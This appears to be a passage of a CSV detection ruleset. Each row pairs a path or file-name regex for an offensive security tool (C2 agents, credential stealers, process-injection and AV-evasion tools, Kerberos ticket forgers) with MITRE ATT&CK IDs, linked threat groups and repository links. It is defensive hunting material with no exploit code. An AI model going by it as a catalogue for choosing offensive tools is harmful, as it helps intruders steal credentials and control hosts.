"*/thanatos.dll*",".{0,1000}\/thanatos\.dll.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","1","N/A","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","11880"
"*/thanatos.exe*",".{0,1000}\/thanatos\.exe.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","1","N/A","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","11881"
"*/thanatos.git*",".{0,1000}\/thanatos\.git.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","1","N/A","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","11882"
"*/thanatos/releases/*",".{0,1000}\/thanatos\/releases\/.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","1","N/A","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","11883"
"*/thanatos/releases/latest*",".{0,1000}\/thanatos\/releases\/latest.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","1","N/A","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","11884"
"*/thanatos/thanatos/agent_code/*",".{0,1000}\/thanatos\/thanatos\/agent_code\/.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","#linux","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","11885"
"*/thc-hydra/*",".{0,1000}\/thc\-hydra\/.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","11886"
"*/the-backdoor-factory.git*",".{0,1000}\/the\-backdoor\-factory\.git.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE  ELF  Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","11887"
"*/TheFatRat*",".{0,1000}\/TheFatRat.{0,1000}","offensive_tool_keyword","TheFatRat","Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and dll.","T1027 - T1059 - T1105 - T1218","TA0002 - TA0003","N/A","N/A","Exploitation tool","https://github.com/Screetsec/TheFatRat","1","0","#linux","N/A","N/A","10","9941","2324","2024-03-17T12:09:38Z","2016-07-24T10:30:19Z","11888"
"*/theHarvester.py*",".{0,1000}\/theHarvester\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","11889"
"*/theHarvester.py*",".{0,1000}\/theHarvester\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","11890"
"*/theHarvester.py*",".{0,1000}\/theHarvester\.py.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","#linux","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","11891"
"*/Theif.dll*",".{0,1000}\/Theif\.dll.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","1","N/A","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","11892"
"*/ThemeBleed.exe*",".{0,1000}\/ThemeBleed\.exe.{0,1000}","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation tool","https://github.com/gabe-k/themebleed","1","0","N/A","N/A","10","2","196","37","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z","11893"
"*/thief.py*",".{0,1000}\/thief\.py.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","1","N/A","N/A","9","2","189","35","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z","11894"
"*/ThievingFox.git*",".{0,1000}\/ThievingFox\.git.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","1","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","11895"
"*/ThievingFox.py*",".{0,1000}\/ThievingFox\.py.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","1","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","11896"
"*/thirdparty/msf/*",".{0,1000}\/thirdparty\/msf\/.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","0","#linux","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","11897"
"*/ThisIsNotRat.git*",".{0,1000}\/ThisIsNotRat\.git.{0,1000}","offensive_tool_keyword","ThisIsNotRat","control windows computeur from telegram","T1098 - T1079 - T1105 - T1047 - T1059","TA0010 - TA0009 - TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RealBey/ThisIsNotRat","1","1","N/A","N/A","9","10","64","17","2023-09-10T07:39:38Z","2023-09-07T14:07:32Z","11898"
"*/thoth.git*",".{0,1000}\/thoth\.git.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","11899"
"*/thread-injector.exe*",".{0,1000}\/thread\-injector\.exe.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","11900"
"*/ThreadlessInject.git*",".{0,1000}\/ThreadlessInject\.git.{0,1000}","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","1","N/A","N/A","10","8","751","88","2024-09-04T17:11:58Z","2023-02-05T13:50:15Z","11901"
"*/Thread-Pool-Injection-PoC.git*",".{0,1000}\/Thread\-Pool\-Injection\-PoC\.git.{0,1000}","offensive_tool_keyword","Thread-Pool-Injection-PoC","Proof of concept code for thread pool based process injection in Windows.","T1055.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/Uri3n/Thread-Pool-Injection-PoC","1","1","N/A","N/A","8","2","115","13","2025-03-29T23:14:47Z","2024-01-24T07:42:08Z","11902"
"*/ThreatCheck.git*",".{0,1000}\/ThreatCheck\.git.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","10","10","1185","143","2024-06-01T16:46:57Z","2020-10-08T11:22:26Z","11903"
"*/Throwback.git*",".{0,1000}\/Throwback\.git.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","1","N/A","N/A","10","10","306","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z","11904"
"*/ThrowbackDLL/*",".{0,1000}\/ThrowbackDLL\/.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","1","N/A","N/A","10","10","306","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z","11905"
"*/ThunderDNS*",".{0,1000}\/ThunderDNS.{0,1000}","offensive_tool_keyword","ThunderDNS","This tool can forward TCP traffic over DNS protocol","T1095 - T1071.004","TA0011 - TA0003","N/A","N/A","C2","https://github.com/fbkcs/ThunderDNS","1","1","N/A","N/A","10","10","410","63","2019-12-24T12:41:17Z","2018-12-04T15:18:47Z","11906"
"*/ThunderFox.exe*",".{0,1000}\/ThunderFox\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11907"
"*/thycotic_secretserver_dump.rb*",".{0,1000}\/thycotic_secretserver_dump\.rb.{0,1000}","offensive_tool_keyword","SecretServerSecretStealer","Powershell script that decrypts the data stored within a Thycotic Secret Server","T1552 - T1027 - T1059","TA0006","N/A","EvilCorp*","Credential Access","https://github.com/denandz/SecretServerSecretStealer","1","1","N/A","N/A","10","1","78","14","2020-08-03T06:52:27Z","2017-04-21T04:06:24Z","11908"
"*/ticket_converter.py*",".{0,1000}\/ticket_converter\.py.{0,1000}","offensive_tool_keyword","ticket_converter","A little tool to convert ccache tickets into kirbi (KRB-CRED) and vice versa based on impacket.","T1558.003 - T1110.004","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/zer1t0/ticket_converter","1","1","N/A","N/A","10","2","167","31","2022-06-16T19:38:05Z","2019-05-14T04:48:19Z","11909"
"*/ticketConverter.exe*",".{0,1000}\/ticketConverter\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","11910"
"*/ticketConverter.py*",".{0,1000}\/ticketConverter\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","11911"
"*/ticketConverter.py*",".{0,1000}\/ticketConverter\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","11912"
"*/ticketer.exe*",".{0,1000}\/ticketer\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","11913"
"*/ticketer.py -*",".{0,1000}\/ticketer\.py\s\-.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","#linux","N/A","10","9","842","113","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z","11914"
"*/ticketer.py*",".{0,1000}\/ticketer\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#linux","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","11915"
"*/ticketer.py*",".{0,1000}\/ticketer\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","11916"
"*/ticketer.py*",".{0,1000}\/ticketer\.py.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","N/A","1","72","9","2024-06-05T14:56:28Z","2021-11-04T15:30:12Z","11917"
"*/ticketsplease.py*",".{0,1000}\/ticketsplease\.py.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","N/A","1","72","9","2024-06-05T14:56:28Z","2021-11-04T15:30:12Z","11918"
"*/TikiLoader/*",".{0,1000}\/TikiLoader\/.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","11920"
"*/TikiSpawn.*",".{0,1000}\/TikiSpawn\..{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","11921"
"*/TikiSpawn/*",".{0,1000}\/TikiSpawn\/.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","11922"
"*/TimeException.exe*",".{0,1000}\/TimeException\.exe.{0,1000}","offensive_tool_keyword","TimeException","A tool to find folders excluded from AV real-time scanning using a time oracle","T1518.001 - T1070.004 - T1083","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/bananabr/TimeException","1","1","N/A","N/A","8","3","233","16","2024-02-13T16:22:09Z","2022-07-19T02:47:52Z","11923"
"*/TimeException.git*",".{0,1000}\/TimeException\.git.{0,1000}","offensive_tool_keyword","TimeException","A tool to find folders excluded from AV real-time scanning using a time oracle","T1518.001 - T1070.004 - T1083","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/bananabr/TimeException","1","1","N/A","N/A","8","3","233","16","2024-02-13T16:22:09Z","2022-07-19T02:47:52Z","11924"
"*/timeoutpwn64*",".{0,1000}\/timeoutpwn64.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","11925"
"*/timestomp.py*",".{0,1000}\/timestomp\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","11926"
"*/timestomping.ps1*",".{0,1000}\/timestomping\.ps1.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","11927"
"*/timwr/CVE-2016-5195*",".{0,1000}\/timwr\/CVE\-2016\-5195.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/timwr/CVE-2016-5195","1","1","N/A","N/A","N/A","10","972","393","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z","11928"
